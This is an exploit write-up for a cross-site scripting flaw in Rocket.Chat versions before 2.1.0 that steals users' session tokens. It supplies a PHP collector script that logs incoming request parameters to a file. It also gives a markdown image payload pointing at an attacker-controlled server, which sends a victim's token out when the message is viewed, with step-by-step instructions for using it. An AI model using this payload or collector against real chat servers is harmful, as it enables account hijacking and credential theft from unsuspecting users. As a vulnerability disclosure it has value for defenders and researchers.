#[+] Title:  Rocket.Chat - Cross Site Scripting Exploit (Token Hijack)
#[+] Product: Rocket.Chat
#[+] Vendor: https://rocket.chat/
#[+] Vulnerable Version(s): Rocket.Chat < 2.1.0
#
#
# Author      :   3H34N
# Ehsan Nezami
# Website     :   nezami.me
# Twitter     :   https://twitter.com/mr_ehsane
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)


1. Create l33t.php on a web server 


<?php
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

2. Open a chat session
3. Send payload with your web server url


![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

4. Token will be written in logs.txt when target seen your message.